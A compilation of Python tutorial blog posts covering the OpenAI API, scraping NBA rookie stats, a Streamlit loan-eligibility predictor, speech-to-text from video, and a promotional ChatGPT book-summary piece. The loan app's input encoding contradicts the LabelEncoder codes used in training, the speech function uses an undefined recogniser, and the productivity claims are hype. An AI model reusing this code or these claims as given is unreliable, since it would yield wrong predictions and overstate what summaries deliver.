You’ve seen dashboards before; think election result visualizations you can update in real-time, or population maps you can filter by demographic.

With the Python Dash library, you’ll create analytic dashboards that present data in effective, usable, elegant ways in just a few lines of code.

Get the book on NoStarch or Amazon!



OpenAI API – or How I Made My Python Code Intelligent


In this quick tutorial, I’ll show you how I integrated ChatGPT intelligence into an app I’m currently working on. It’s really simple, so let’s get started!

Step 1: Create a Paid Account with OpenAI

I’m not affiliated with OpenAI in any way. However, to use it, you need to create a (paid) account and generate an API key that connects ChatGPT with your code.

👉 Click here to create an account and connect it with your credit card

I use it a lot and pay only a couple of cents per day so it’s really inexpensive for now.

Step 2: Get Your API Key

Open the link https://beta.openai.com/playground and navigate to Personal > View API keys.

Now, click the + Create new secret key button to create a new API key:

Now copy the API key to your clipboard:

Step 3: Pip Install OpenAI

Use your version of pip to install the openai module by running a command similar to the following (depending on your local environment):

  • pip install openai
  • pip3 install openai
  • pip3.11 install openai

As I had Python 3.9 installed at the time of writing, I used pip3.9 install openai:

You can check your Python version here and learn how to install a module here.

Step 4: Python Code to Access OpenAI

Copy and paste the following code into a Python script (e.g., named code.py) and also paste your API key from Step 2 into the highlighted line (string):

import os
import openai

openai.api_key = "<copy your secret API key here>"

response = openai.Completion.create(
    model="text-davinci-003",
    prompt="What is the answer to all questions?",
    temperature=0.7,
    max_tokens=100,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0
)

print(response)

You can modify the prompt string "What is the answer to all questions?" to customize your input prompt. The output after a few seconds will look like this:

{
  "choices": [
    {
      "finish_reason": "stop",
      "index": 0,
      "logprobs": null,
      "text": "\n\nThere is no one answer to all questions as each question has its own unique answer."
    }
  ],
  "created": 1674579571,
  "id": "cmpl-6cGvr0TM2PGsExeyG3NEx43CrNwSx",
  "model": "text-davinci-003",
  "object": "text_completion",
  "usage": {
    "completion_tokens": 19,
    "prompt_tokens": 8,
    "total_tokens": 27
  }
}
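If you only need the generated text rather than the full JSON, you can index into the response object; this assumes the pre-1.0 openai package used above:

# Extract just the completion text from the response (openai < 1.0 interface)
answer = response["choices"][0]["text"].strip()
print(answer)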

Unfortunately, it couldn’t figure out the answer 42. 😉


Basketball Statistics – Page Scraping Using Python and BeautifulSoup


In this blog series, powerful Python libraries are leveraged to help uncover some hidden statistical truths in basketball. The first step in any data-driven approach is to identify and collect the data needed.

Luckily for us, Basketball-Reference.com hosts pages of basketball data that can be easily scraped. The processes of this walkthrough can be easily applied to any number of their pages, but for this case, we plan on scraping seasonal statistics of multiple rookie classes.

Project Overview

The Objectives:

  1. Identify the Data Source
  2. Download the Page
  3. Identify Important Page Elements
  4. Pre-Clean and Extract
  5. Archive

The Tools:

  • Requests
  • Beautiful Soup
  • Pandas

Though we will inevitably be working with many specialized libraries throughout this project, the above packages will suffice for now.

Identifying the Data Source

Basketball-Reference.com hosts hundreds of curated pages on basketball statistics that range from seasonal averages of typical box score categories like points, rebounds, and shooting percentages, all the way down to the play-by-play action of each game played in the last 20 or so years. One can easily lose their way in this statistical tsunami if there isn’t a clear goal set on what exactly to look for.

The goal here in this post is simple: get rookie data that will help in assessing a young player’s true value and potential.

The following link is one such page. It lists all the relevant statistics of rookies in a particular season.

👉 Link: https://www.basketball-reference.com/leagues/NBA_1990_rookies-season-stats.html

In order to accumulate enough data to make solid statistical inferences on players, one year of data won’t cut it. There need to be dozens of years’ worth of data collected to help filter through the noise and come to a conclusion on a player’s future potential.

If an action can be manually repeated, it makes itself a great candidate for automation. In this case, the number in the URL above corresponds to the respective year of that rookie class. Powered by that knowledge, let’s start putting together our first lines of code.

import requests
import pandas as pd
from bs4 import BeautifulSoup

# the years we wish to parse
years = list(range(1990, 2017))
url_base = "https://www.basketball-reference.com/leagues/NBA_{}_rookies-season-stats.html"

In creating the two variables referenced above, our thought process is as follows.

  1. The appropriate packages are imported
  2. url_base stores the target URL as a pre-formatted string; its {} placeholder will be filled in with the year
  3. The years list variable specifies the range of desired years, 1990 through 2016 (range(1990, 2017) excludes the end value)

Downloading the Page Data

In scraping web pages, it’s imperative to remove as much overhead as possible. Seeing as the site stores all their information on the HTML front end, the page can be easily downloaded and locally stored in its entirety.

# iterate through each year and download the page into an HTML file
for year in years:
    url = url_base.format(year)
    data = requests.get(url)
    # page is saved as HTML and placed in the Rookies folder
    with open("notebooks/Rookies/{}.html".format(year), "w+") as f:
        f.write(data.text)

The for loop iterates through the list variable years.

The curly braces within the URL string allow format to substitute in the currently iterated year.

For example, in its first iteration, the url value will be 'https://www.basketball-reference.com/leagues/NBA_1990_rookies-season-stats.html'.

On its second iteration, the subsequent year would be referenced instead (https://www.basketball-reference.com/leagues/NBA_1991_rookies-season-stats.html)

The data variable holds the response returned by requests.get() for the currently iterated url string value.

The requests method then uses the newly formatted URL string to retrieve the page in question.

The subsequent with open() opens a file for writing (w+), writes the page data from our request (data.text), and locally stores the newly created HTML file.

Why download the page and store it locally?

To avoid a common growing pain in site scraping, we store these pages as local HTML files.

See, when making a visit to a page site, the server hosting said page has to honor your request and send back the appropriate data to your browser. But having one specific client asking for the same information over and over puts undue strain on the server.

The server admin is well within their rights to block these persistent requests for the sake of being able to optimally provide this service to others online.

By downloading these HTML files to your local machine, you avoid two things (see the caching sketch after this list):

  1. Having to wait longer than usual to collect the same data
  2. Being blocked from visiting the page, halting data collection altogether
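One lightweight way to bake this idea into the code is to download a page only when no local copy exists yet. The helper below is a sketch of my own; the function name and cache folder are illustrative, not part of the original script:

import os
import requests

def get_page(year, url_base, cache_dir="notebooks/Rookies"):
    """Return the HTML for a given year, downloading it only if no local copy exists."""
    path = os.path.join(cache_dir, "{}.html".format(year))
    if not os.path.exists(path):
        data = requests.get(url_base.format(year))
        with open(path, "w+") as f:
            f.write(data.text)
    with open(path) as f:
        return f.read()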

Identifying Important Page Elements

To scrape data elements of these recently downloaded pages using Python, there needs to be a means to understand what properties these HTML elements have. In order to identify these properties, we need to inspect the page itself.

How to Inspect

We’ll need to dive deeper into the inner workings of this document, but I promise I won’t make this an exercise on learning HTML.

If you know how to inspect HTML objects, feel free to jump ahead. Otherwise, please follow along on how to inspect page elements.

Option 1: Developer Tools

  1. Click on the three vertical dots on Chrome’s top menu bar
  2. Choose “More tools”
  3. Select Developer tools.

Option 2: Menu Select

  1. Right-click on the web page
  2. Choose “Inspect” to access the Developer tools panel

Inspecting the Page

Since all of these pages are stored locally, we can either open them from the file system in our browser of choice, or continue building our code with the following snippet.

with open("notebooks/Rookies/2000.html") as f:
    page = f.read()

Below is the loaded page with Developer Tools docked to the right. Notice how hovering the mouse cursor over the HTML line containing the id rookies highlights the table element on the page?

All the desired data of this page is housed in that table element. Before hastily sucking up all of this data as is, now is the best time to consider whether everything on this table is worth collecting.

Pre-Clean

Pre-cleaning might not be a frequent word in your vocabulary, but if you see yourself scraping data regularly, it should be. If you want to avoid the frustration of wasting hours of progress on a data collection project, it’s best to first separate the wheat from the chaff.

For instance, take note of the three elements boxed in red.

One row serves as the “main” table header. The other two rows are duplicate instances of the same artifacts found at the top. This pattern repeats every 20th row.

Upon further inspection of these elements, it’s revealed that all of these rows have the same tr (table row) HTML tag. What distinguishes each of these elements from any others are their class names.

  1. Main Header Row
    a. Class = over_header
  2. Repeat Header Rows
    a. Class = over_header thead
  3. Statistics Category Row
    a. Class = thead
# array to house the list of dataframes
dfs = []

# unnecessary table rows to be removed
classes = ["over_header", "over_header thead", "thead"]
  1. dfs will be used later on to house several data frames
  2. The classes array object will hold all the unwanted table row element’s class names.

Since these elements provide no statistical value, rather than simply “skipping over” them during parsing, they should be completely omitted, that is, permanently removed from any future consideration.

The decompose method serves to remove unwanted elements from a page. As per the official Beautiful Soup documentation:

decompose()

Tag.decompose() removes a tag from the tree, then completely destroys it and its contents.

Below is a snippet of code where the decompose method is applied using nested for loops.

# for loop to iterate through the years
for year in years:
    with open("notebooks/Rookies/{}.html".format(year)) as f:
        page = f.read()
    soup = BeautifulSoup(page, "html.parser")

    # nested for loops clean up unnecessary table
    # headers from reappearing in rows
    for i in classes:
        for tr in soup.find_all("tr", {"class": i}):
            tr.decompose()
  1. First for loop is used to iterate through the values of our years list object
  2. The with statement opens each locally stored HTML file and reads its contents into the page variable
  3. An HTML parser class is initialized by instantiating the BeautifulSoup class and passing in both the page string object and html.parser.
  4. Second for loop iterates through the values in the classes array
  5. Third for loop utilizes Beautiful Soup’s find_all method to identify elements that have both tr tags and class names matching those in classes
  6. tr.decompose serves to omit each of the identified table row elements from the page entirely

Let’s look to build on this by extracting the data we do want.

Extracting the Data

We can finally start working on the part of the code that actually extracts data from the table.

Remember that the table with all of the relevant data has the unique HTML ID rookies. The following additions to our code will serve to parse the data of this table.

# the years we wish to parse
years = list(range(1990, 2017))

# array to house the list of dataframes
dfs = []

# unnecessary table headers to be removed
classes = ["over_header", "over_header thead", "thead"]

for year in years:
    with open("notebooks/Rookies/{}.html".format(year)) as f:
        page = f.read()
    soup = BeautifulSoup(page, "html.parser")

    # for loop cleans up unnecessary table headers from reappearing in rows
    for i in classes:
        for tr in soup.find_all("tr", {"class": i}):
            tr.decompose()

    ### Start Scraping Block ###
    # identifies, scrapes, and loads rookie tables into one dataframe
    rookie_table = soup.find(id="rookies")
    rookies = pd.read_html(str(rookie_table))[0]
    rookies["Year"] = year
    dfs.append(rookies)

# new variable turns list of dataframes into single dataframe
all_rookies = pd.concat(dfs)

For what follows the ### Start Scraping Block ### comment:

  1. The rookie_table variable serves to help identify this, and only this table on the page
  2. Seeing that the Pandas package can read HTML tables, the rookie table is loaded into Pandas using the read_html method, passing rookie_table as a string
  3. Tacking [0] onto the end turns the result from a list of dataframes into a single dataframe
  4. A “Year” column is added to the rookies dataframe
  5. dfs.append(rookies) collects the table of every rookie year, in the order iterated, into a list of dataframes
  6. The Pandas method concat is used to combine that list of dataframes into one single dataframe: all_rookies

Archiving

Our final step involves taking all of this useful, clean information and archiving it in easily readable CSV format. Tacking this line onto the end of our code (outside of any loops!) makes it easy to come back and reference the collected data later.

# dataframe archived as local CSV
all_rookies.to_csv("archive/NBA_Rookies_1990-2016.csv")

Final Product

import requests
import pandas as pd
from bs4 import BeautifulSoup

# the years we wish to parse
years = list(range(1990, 2017))

# array to house the list of dataframes
dfs = []

# unnecessary table headers to be removed
classes = ["over_header", "over_header thead", "thead"]

# loop iterates through the years
for year in years:
    with open("notebooks/Rookies/{}.html".format(year)) as f:
        page = f.read()
    soup = BeautifulSoup(page, "html.parser")

    # second for loop clears unnecessary table headers
    for i in classes:
        for tr in soup.find_all("tr", {"class": i}):
            tr.decompose()

    # identifies, scrapes, and loads rookie tables into one dataframe
    table_rookies = soup.find(id="rookies")
    rookies = pd.read_html(str(table_rookies))[0]
    rookies["Year"] = year
    dfs.append(rookies)

# new variable turns list of dataframes into single dataframe
all_rookies = pd.concat(dfs)

# dataframe archived as local CSV
all_rookies.to_csv("archive/NBA_Rookies_1990-2016.csv")

Closing

Again, the process followed in this walkthrough will undoubtedly apply to most every other page on Basketball-Reference.com.

There are five simple steps worth taking in each instance.

  1. Identify the Page URL
  2. Download the Page
  3. Identify the Elements
  4. Pre-Clean and Extract
  5. Archive

Following these five steps will help guarantee a quick and successful scraping experience.

Next up in this series will be actually using this data to gain insight into future player potential. So be on the lookout for future installments!



How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit


In this tutorial, I will walk you through a machine-learning project on Loan Eligibility Prediction with Python. Specifically, I will show you how to create and deploy machine learning web applications using Streamlit.

Streamlit makes it easy for data scientists with little or no knowledge of web development to develop and deploy machine learning apps quickly. Its compatibility with data science libraries makes it an excellent choice for data scientists looking to deploy their applications.

👉 You can try the live demo app here:

Prerequisites

Although I will try my best to explain some concepts and the steps I took in this project, I assume you already have a basic knowledge of Python and its application in machine learning.

For Streamlit, I will only explain the concepts that have a bearing on this project. If you want to know more, you can check the documentation.

Loan Eligibility Prediction

Banks and other financial institutions give out loans to people. But before they approve a loan, they have to make sure the applicant is eligible to receive it. There are many factors to consider before deciding whether or not the applicant is eligible for the loan. Such factors include, but are not limited to, credit history and the applicant’s income.

To automate the loan approval process, banks and other financial institutions require the applicant to fill in a form in which some personal information will be gathered. These include gender, education, credit history, and so on. An applicant’s loan request will either be approved or rejected based on such information.

In this project, we are going to build a Streamlit dashboard where our users will fill in their details and check if they are eligible for a loan or not. This is a classification problem. Hence, we will use machine learning with Python and a dataset containing information on customers’ past transactions to solve the problem. So, let’s get started.

The Dataset

Let’s load our dataset using the Pandas library.

import pandas as pd
data = pd.read_csv('LoanApprovalPrediction.csv')
data.shape
# (598, 13)

Our dataset contains 598 rows and 13 columns. Using the .info() method, we can get more information about the dataset.

data.info()

We can see all the columns that make up the dataset. If you view the first five rows using data.head(), you will notice that some columns are categorical but their datatypes are shown as object. More on this soon. Let’s check if there are missing values.

data.isna().sum()

Output:

Loan_ID 0
Gender 0
Married 0
Dependents 12
Education 0
Self_Employed 0
ApplicantIncome 0
CoapplicantIncome 0
LoanAmount 21
Loan_Amount_Term 14
Credit_History 49
Property_Area 0
Loan_Status 0
dtype: int64

Wow! Our dataset contains lots of missing values. We have a lot of data cleaning to do. Finally, let’s check if our Loan_ID contains duplicates.

data.Loan_ID.nunique()
# 598

Loan_ID has exactly as many unique values as the dataset has rows, so there are no duplicates. We can safely drop it as it will not be used for training.

# Dropping Loan_ID column
data.drop(['Loan_ID'], axis=1, inplace=True)

By setting the inplace parameter to True, we want the change to be directly applied to our dataset. The axis=1 parameter corresponds to the column side. It’s now time to clean and prepare our dataset for training.

Data Cleaning and Preparation

Seeing that our dataset contains many missing values, we have two options: either we drop the rows with missing values, or we fill them with a given value. To determine which action to take, let’s first check the total number of missing values.

data.isna().sum().sum()
# 96

The dataset contains 96 missing values, which amounts to about 16% of the number of rows, a not-so-insignificant amount. I choose to fill them in instead of dropping the rows. Let’s fill them with the mean value of their respective columns.

Oh! We can’t fill a numeric mean into a categorical column. So, we will first convert the categorical columns to an int datatype.

For this, we can choose to use Pandas’ map function or use LabelEncoder from the Scikit-learn library.

If we use Pandas’ map() function, we will have to repeat the same process for every categorical column. If you are like me and don’t like repeating yourself (DRY), you will choose the second option.

This, though, does not rule out the importance of Pandas’ map function. Therefore, to show its importance and to add to your knowledge, let me show you how to apply it to our dataset.

data.Gender = data.Gender.map({'Male': 0, 'Female':1})

With that, the Gender column gets converted to an int datatype. You would have to repeat this for every categorical column. But since we are converting all of our categorical columns to numeric codes anyway, we will take the easier route with LabelEncoder.
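If you do want to stick with map(), here’s a rough sketch of how you could apply it to several categorical columns in one pass; the mapping dictionaries are illustrative and won’t necessarily match the codes LabelEncoder assigns:

# Illustrative mappings (LabelEncoder may assign different codes)
mappings = {
    'Gender': {'Male': 0, 'Female': 1},
    'Married': {'No': 0, 'Yes': 1},
    'Education': {'Graduate': 0, 'Not Graduate': 1},
    'Self_Employed': {'No': 0, 'Yes': 1},
}

for col, mapping in mappings.items():
    data[col] = data[col].map(mapping)

With that detour out of the way, here is the LabelEncoder approach we will actually use: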

from sklearn.preprocessing import LabelEncoder
label_encoder = LabelEncoder()
obj = (data.dtypes == 'object')
for col in list(obj[obj].index):
    data[col] = label_encoder.fit_transform(data[col])

We want to select only the columns with the object datatype. We start by creating a Boolean Series, obj, which is True for columns with the object datatype. Then we apply a Boolean mask, obj[obj], which filters out only the columns with the object datatype so the loop can transform each of them to integer codes.
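To make the Boolean mask idea concrete, here’s a tiny self-contained sketch with a made-up DataFrame:

import pandas as pd

df = pd.DataFrame({'a': ['x', 'y'], 'b': [1, 2], 'c': ['m', 'n']})

obj = (df.dtypes == 'object')   # Boolean Series indexed by column name
print(obj)
# a     True
# b    False
# c     True
# dtype: bool

print(list(obj[obj].index))     # keep only the True entries -> object columns
# ['a', 'c']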

You can confirm it using the .info() method and you will see that all our categorical columns have been converted to int datatype. Having done that, we can now fill in the missing values.

for col in data.columns:
    data[col] = data[col].fillna(data[col].mean())

We fill the missing values with the mean of their respective columns. Again, you can confirm it by typing data.isnull().sum() or data.isna().sum().
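As a quick sanity check, the total count of missing values should now be zero:

data.isna().sum().sum()
# 0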

Model Training

It’s now time to train selected models on our data. We will first divide the dataset into two parts: the features (x) and the target (y) variable.

x = data.drop(['Loan_Status'], axis=1)
y = data.Loan_Status

We then split both the features and the target into training and testing sets using train_test_split from Scikit-learn.

from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)

We reserved 30% of our dataset for testing the model. By setting a random_state to a given number, we ensure we get the same set of data whenever the code is run. It’s now time to select a model.

We don’t know what algorithm or model will do well on our dataset. For this reason, we will test our data with different models and select the model with the highest accuracy score.

from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

models = []
models.append(('LR', LogisticRegression(max_iter=1000)))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append(('SVC', SVC()))
models.append(('RC', RidgeClassifier()))
models.append(('RF', RandomForestClassifier()))

def modeling(model):
    model.fit(x_train, y_train)
    y_pred = model.predict(x_test)
    return accuracy_score(y_test, y_pred) * 100

for name, model in models:
    print(f'{name} = {modeling(model)}')

Output:

LR = 80.83333333333333
LDA = 82.5
KNN = 63.74999999999999
CART = 68.33333333333333
NB = 81.66666666666667
SVC = 69.16666666666667
RC = 82.91666666666667
RF = 81.66666666666667

The results show that the Ridge Classifier performs better than the other models, followed by Linear Discriminant Analysis with only a slight difference. Both could benefit from further study.

However, we will use the Ridge Classifier algorithm.
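If you want a slightly more robust comparison of the two front-runners than a single train/test split, here’s a minimal cross-validation sketch; the choice of 5 folds is arbitrary and not something used elsewhere in this project:

from sklearn.model_selection import cross_val_score
from sklearn.linear_model import RidgeClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

for name, model in [('RC', RidgeClassifier()), ('LDA', LinearDiscriminantAnalysis())]:
    scores = cross_val_score(model, x, y, cv=5, scoring='accuracy')
    print(f'{name}: mean={scores.mean():.3f}, std={scores.std():.3f}')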

Here is the full training code. Save the script as model.py:

import pandas as pd
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeClassifier
from sklearn.metrics import accuracy_score
import pickle

# load the data
data = pd.read_csv('LoanApprovalPrediction.csv')

# drop Loan_ID column
data.drop(['Loan_ID'], axis=1, inplace=True)

# convert categorical columns to int datatype
label_encoder = LabelEncoder()
obj = (data.dtypes == 'object')
for col in list(obj[obj].index):
    data[col] = label_encoder.fit_transform(data[col])

# fill in missing values
for col in data.columns:
    data[col] = data[col].fillna(data[col].mean())

# divide into features and target variable
x = data.drop(['Loan_Status'], axis=1)
y = data.Loan_Status

# divide into training and testing data
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)

# define the model
model = RidgeClassifier()

# fit the model on the training data
model.fit(x_train, y_train)

# save the trained model
with open('train_model.pkl', mode='wb') as pkl:
    pickle.dump(model, pkl)

By saving the model in a pickle file, we can load it later to make predictions, saving ourselves the time of retraining the model each time the app runs.
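As a quick sanity check, and assuming x_test and y_test from model.py are still in memory (or recreated with the same random_state), you could reload the pickled model and confirm its accuracy:

import pickle
from sklearn.metrics import accuracy_score

with open('train_model.pkl', 'rb') as pkl:
    loaded_model = pickle.load(pkl)

print(accuracy_score(y_test, loaded_model.predict(x_test)) * 100)
# should match the Ridge Classifier accuracy reported above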

Preparing Streamlit Dashboard

Now that we are done training our model, let’s prepare the Streamlit interface. We will start by defining our main() function. Since we also want it to run when we open the Streamlit app, we will call it under the __name__ check at the end of the script. Save this script with the name app.py:

import streamlit as st

def main():
    bg = """<div style='background-color:black; padding:13px'>
    <h1 style='color:white'>Streamlit Loan Eligibility Prediction App</h1>
    </div>"""
    st.markdown(bg, unsafe_allow_html=True)

    left, right = st.columns((2, 2))
    gender = left.selectbox('Gender', ('Male', 'Female'))
    married = right.selectbox('Married', ('Yes', 'No'))
    dependent = left.selectbox('Dependents', ('None', 'One', 'Two', 'Three'))
    education = right.selectbox('Education', ('Graduate', 'Not Graduate'))
    self_employed = left.selectbox('Self-Employed', ('Yes', 'No'))
    applicant_income = right.number_input('Applicant Income')
    coApplicantIncome = left.number_input('Coapplicant Income')
    loanAmount = right.number_input('Loan Amount')
    loan_amount_term = left.number_input('Loan Tenor (in months)')
    creditHistory = right.number_input('Credit History', 0.0, 1.0)
    propertyArea = st.selectbox('Property Area', ('Semiurban', 'Urban', 'Rural'))
    button = st.button('Predict')

    # if button is clicked
    if button:
        # make prediction
        result = predict(gender, married, dependent, education, self_employed,
                         applicant_income, coApplicantIncome, loanAmount,
                         loan_amount_term, creditHistory, propertyArea)
        st.success(f'You are {result} for the loan')

We imported the Streamlit library. Then, we added color using HTML tags; since Streamlit does not render raw HTML by default, we set the parameter unsafe_allow_html=True to make it render. Without it, the black background would not appear.

We displayed several number inputs and select boxes to collect data from our users, which will, in turn, be used to make predictions.

Notice that we used the exact category labels found in the dataset’s columns. Since we have already transformed the categorical columns to int datatypes, you may have to reload the dataset and use the .value_counts() method on each column to see the original labels.
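For example, here’s one way to inspect the original labels of a single column; the column name is taken from the dataset listing above:

import pandas as pd

raw = pd.read_csv('LoanApprovalPrediction.csv')
print(raw['Property_Area'].value_counts())
# shows the Semiurban / Urban / Rural labels and their counts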

Let’s now define our predict() function.

# load the train model
import pickle

with open('train_model.pkl', 'rb') as pkl:
    train_model = pickle.load(pkl)

def predict(gender, married, dependent, education, self_employed,
            applicant_income, coApplicantIncome, loanAmount,
            loan_amount_term, creditHistory, propertyArea):
    # processing user input
    gen = 0 if gender == 'Male' else 1
    mar = 0 if married == 'Yes' else 1
    dep = float(0 if dependent == 'None' else 1 if dependent == 'One' else 2 if dependent == 'Two' else 3)
    edu = 0 if education == 'Graduate' else 1
    sem = 0 if self_employed == 'Yes' else 1
    pro = 0 if propertyArea == 'Semiurban' else 1 if propertyArea == 'Urban' else 2
    Lam = loanAmount / 1000
    cap = coApplicantIncome / 1000

    # making predictions (using the scaled values Lam and cap, as discussed below)
    prediction = train_model.predict([[gen, mar, dep, edu, sem, applicant_income,
                                       cap, Lam, loan_amount_term,
                                       creditHistory, pro]])
    verdict = 'Not Eligible' if prediction == 0 else 'Eligible'
    return verdict

# run the app via the __name__ check mentioned above
if __name__ == '__main__':
    main()

The predict() function takes all the features of our dataset as parameters. Then, we used ternary operators to change the user input into numbers. Notice that we converted the dep variable to a float. We did all this to ensure the inputs correspond to the datatypes in our dataset.

Also, we made sure that the order of the parameters, both in the function signature and in the prediction call, matches the order used in the main() function and in the training data. Getting this wrong will either lead to an error or to poor predictions.

Why did we divide loanAmount and coApplicantIncome by 1,000? Well, I will leave that to you to answer. Just to give you a little hint: type data.LoanAmount.describe() and see if you can figure it out yourself.
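If you want a nudge in the right direction, comparing the scales of the income and loan columns (column names as listed in the dataset above) is a good start:

print(data[['ApplicantIncome', 'CoapplicantIncome', 'LoanAmount']].describe())
# Compare the typical magnitudes of these columns with the absolute
# amounts a user would type into the app.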

Conclusion

With this, we come to the end of this tutorial.

You have learned how to apply machine learning to a classification problem such as loan prediction.

You also learned how to create an interactive dashboard using Streamlit. Now, to deploy it on Streamlit Cloud so that others can use it, sign up on Streamlit and GitHub if you haven’t done so.
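Streamlit Cloud installs the packages listed in a requirements.txt file in your repository. A minimal sketch based on the imports used in this project (the exact package set and versions are up to you):

streamlit
pandas
scikit-learn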

Check my GitHub page for the full code. Create a repository and deploy it to Streamlit Cloud. You can view my live demo app here. In a future article, I will show you how to use machine learning to solve a regression problem. Alright, have a nice day.

Posted on Leave a comment

Reading 365 Books in 365 Days Possible? Yes, with ChatGPT!

4/5 – (1 vote)

It’s no surprise that many of us are looking for ways to increase our productivity. After all, an increase in productivity can mean an increase in our income and a better quality of life.

  • For example, if you’re a freelance developer earning $40,000 per year and you increase both the number of clients you serve and the value per client by 2x, your income quadruples to $160,000; add a 50% premium for higher-quality work and it can easily jump to $240,000, a very realistic assumption.
  • Or say you’re the owner of a fast-growing startup, and you boost your productivity to achieve an additional +15% growth per year. For a company with $200,000 in sales, $150,000 in net profit, and a valuation of $800,000, that extra growth compounds to roughly 2x over five years (1.15^5 ≈ 2), which means a nice little bonus of about $800,000 in exit value!

But how can we achieve such a lofty goal of boosting our productivity?

Enter ChatGPT, the revolutionary new artificial intelligence technology that can help us increase our productivity by 10x to 100x. And now, a new idea has emerged for how we can use ChatGPT to rapidly increase our personal growth: speed reading books.

Made by DALL.E

Warren Buffett famously said that “knowledge compounds.” The idea is that if we can improve our skills by just 1% each day, we end up roughly 37x better after a year.
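A quick back-of-the-envelope check of that compounding claim in Python:

print(1.01 ** 365)
# ≈ 37.78, i.e., roughly 37x after a year of 1% daily improvements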

But how can we actually achieve this?

One of the most potent ways is to simply become a much more effective person by consuming massive amounts of high-quality information related to your area of expertise. Warren Buffett fills his extremely valuable time with reading for more than five hours every day. Most other billionaires share his habit of reading tons of books in their areas of interest.

Books are full of knowledge, and they are not filled with the shallow distractions and low-quality or misleading content found on social media. After top-level research papers, books are the highest-quality source of information, followed by quality blogs, news sites, forums, and social networks.

Made by DALL.E

Average Information Quality (Ranking):

  1. ⭐ A-level research papers
  2. ⭐ Books
  3. ⭐ Quality blogs
  4. ❌ News sites
  5. ❌ Forums
  6. ❌ Social networks

By focusing our information consumption on the top three sources, we can expect to see a dramatic increase in our knowledge. ChatGPT helps us to accomplish this by allowing us to read condensed versions of quality books in mere minutes. With ChatGPT, we can theoretically read 365 books in 365 days!

An intelligent chat bot could help you understand the main points of non-fiction books by summarizing the content of the book.

In fact, I did exactly that to help me understand the main points of the lengthy 1,200-page book “Atlas Shrugged”:

🌍 Recommended: Atlas Shrugged 1200 Pages in 5 Minutes

The chat bot uses natural language processing and machine learning algorithms to scan the text and extract key concepts and ideas. The chat bot could then generate a summary of the book and present it to you in a conversational format, allowing you to interact with it and ask it questions.

This helps you quickly get an overview of the main points of the book so you can decide whether or not you want to read it in more depth.

You can ask it all kinds of questions to dive deeper into various aspects of the book. You can even ask it to generate a series of questions to ask about the book — and ask it those questions right afterwards! 🤯

Imagine the possibilities if we could rapidly increase our knowledge by reading more quality books! We could become much more effective and efficient human beings and experience a leap in productivity.

These productivity levels are now within our reach, thanks to the powerful technology of ChatGPT. Reading 365 books in 365 days is now a reality, and with it comes the potential for rapid personal growth.

🌍 Recommended: 16 Best Ideas on How Early Adopters Use ChatGPT to Get More Done in 2023

Posted on Leave a comment

Python Video to Text – Speech Recognition

5/5 – (1 vote)

A good friend and his wife recently founded an AI startup in the lifestyle niche that uses machine learning to discover specific real-world patterns from videos.

For their business system, they need a pipeline that takes a video file, converts it to audio, and transcribes the audio to plain text that is then used for further processing. I couldn’t help but put together a basic solution to their business problem.

Project Overview

I finished the project in three steps:

  • First, install the necessary libraries.
  • Second, convert the video to an audio file (.mp4 to .wav)
  • Third, convert the audio file to a speech file (.wav to .txt). We first break the large audio file into smaller chunks and convert each of them separately due to the size restrictions of the used API.

Let’s get started!

Step 1: Install Libraries

We need the following import statements in our code:

# Import libraries
import speech_recognition as sr
import os
from pydub import AudioSegment
from pydub.silence import split_on_silence
import moviepy.editor as mp

Consequently, you need to pip install the following three libraries in your shell — assuming you run Python version 3.9:

pip3.9 install pydub
pip3.9 install SpeechRecognition
pip3.9 install moviepy

The os module is already preinstalled as a Python Standard Library.

If you need an additional guide on how to install Python libraries, check out this tutorial:

👉 Recommended: Python Install Library Guide

Step 2: Video to Audio

Before we can do speech recognition on the video, we need to extract the audio as a .wav file using the moviepy.editor.VideoFileClip().audio.write_audiofile() method.

Here’s the code:

def video_to_audio(in_path, out_path):
    """Convert video file to audio file"""
    video = mp.VideoFileClip(in_path)
    video.audio.write_audiofile(out_path)

👉 Recommended: Python Video to Audio

Step 3: Audio to Text

After extracting the audio file, we can start transcribing the speech from the .wav file using Google’s powerful speech recognition library on chunks of the potentially large audio file.

Using chunks instead of passing the whole audio file avoids an error for large audio files — Google has some restrictions on the audio file size.

However, you can play around with the splitting thresholds of 700ms silence—it can be more or less, depending on your concrete file.
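For example, a variant with a more aggressive split might look like the following; the numbers are just a starting point to experiment with, and sound refers to the pydub AudioSegment created inside the function below:

chunks = split_on_silence(sound,
                          min_silence_len=500,             # treat 500 ms of silence as a break
                          silence_thresh=sound.dBFS - 16,  # stricter notion of "silence"
                          keep_silence=300)                # keep a short pause at chunk edges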

Here’s the audio to text code function that worked for me:

def large_audio_to_text(path):
    """Split audio into chunks and apply speech recognition"""
    # Open audio file with pydub
    sound = AudioSegment.from_wav(path)

    # Split audio where silence is 700ms or greater and get chunks
    chunks = split_on_silence(sound,
                              min_silence_len=700,
                              silence_thresh=sound.dBFS-14,
                              keep_silence=700)

    # Create folder to store audio chunks
    folder_name = "audio-chunks"
    if not os.path.isdir(folder_name):
        os.mkdir(folder_name)

    whole_text = ""

    # Process each chunk
    for i, audio_chunk in enumerate(chunks, start=1):
        # Export chunk and save in folder
        chunk_filename = os.path.join(folder_name, f"chunk{i}.wav")
        audio_chunk.export(chunk_filename, format="wav")

        # Recognize chunk
        with sr.AudioFile(chunk_filename) as source:
            audio_listened = r.record(source)

            # Convert to text
            try:
                text = r.recognize_google(audio_listened)
            except sr.UnknownValueError as e:
                print("Error:", str(e))
            else:
                text = f"{text.capitalize()}. "
                print(chunk_filename, ":", text)
                whole_text += text

    # Return text for all chunks
    return whole_text

Need more info? Check out the following deep dive:

👉 Recommended: Large Audio to Text? Here’s My Speech Recognition Solution in Python

